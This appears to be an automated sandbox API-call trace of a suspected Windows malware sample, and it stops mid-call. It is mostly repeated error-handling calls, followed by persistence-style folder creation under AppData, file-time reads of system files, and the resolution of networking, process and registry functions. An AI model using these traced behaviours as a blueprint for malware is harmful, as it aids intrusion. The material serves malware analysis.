GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.457] SetLastError (dwErrCode=0x0) [0034.457] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.458] SetLastError (dwErrCode=0x0) [0034.458] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.459] GetLastError () returned 0x0 [0034.459] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.460] SetLastError (dwErrCode=0x0) [0034.460] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.461] SetLastError (dwErrCode=0x0) [0034.461] GetLastError () returned 0x0 [0034.472] SetLastError (dwErrCode=0x0) [0034.472] GetLastError () returned 0x0 [0034.472] SetLastError (dwErrCode=0x0) [0034.472] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.473] SetLastError (dwErrCode=0x0) [0034.473] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.474] GetLastError () returned 0x0 [0034.474] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.475] SetLastError (dwErrCode=0x0) [0034.475] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.476] SetLastError (dwErrCode=0x0) [0034.476] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.477] SetLastError (dwErrCode=0x0) [0034.477] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.478] SetLastError (dwErrCode=0x0) [0034.478] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.479] SetLastError (dwErrCode=0x0) [0034.479] GetLastError () returned 0x0 [0034.480] SetLastError (dwErrCode=0x0) [0034.480] GetLastError () returned 0x0 [0034.480] SetLastError (dwErrCode=0x0) [0034.480] GetLastError () returned 0x0 [0034.480] SetLastError (dwErrCode=0x0) [0034.480] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.480] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.480] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.481] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef978 | out: lpSystemTimeAsFileTime=0x2ef978*(dwLowDateTime=0xe23d2730, dwHighDateTime=0x1d3dfba)) [0034.481] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef8b0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.481] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef798, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.481] GetLastError () returned 0x0 [0034.481] GetLastError () returned 0x0 [0034.481] GetLastError () returned 0x0 [0034.481] GetLastError () returned 0x0 [0034.481] GetLastError () returned 0x0 [0034.481] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetLastError () returned 0x0 [0034.482] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.482] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.482] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.482] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.482] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.482] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.482] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.482] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.482] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.482] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.482] GetLastError () returned 0xb7 [0034.482] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.482] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.482] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.482] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.483] wsprintfA (in: param_1=0x2ef618, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.483] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.483] wsprintfA (in: param_1=0x2ef514, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.483] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.483] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.483] CloseHandle (hObject=0x74) returned 1 [0034.483] GetLastError () returned 0x0 [0034.483] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.483] GetLastError () returned 0x0 [0034.483] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.483] GetSystemDirectoryA (in: lpBuffer=0x2ef618, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.483] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.483] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.483] CloseHandle (hObject=0x74) returned 1 [0034.483] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.483] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.484] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.485] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.485] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.485] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.485] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.485] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.485] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.485] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.485] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.485] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.485] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.485] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.485] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.485] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.486] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.487] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.487] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.487] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.487] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.487] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.487] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.487] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.487] GetProcAddress 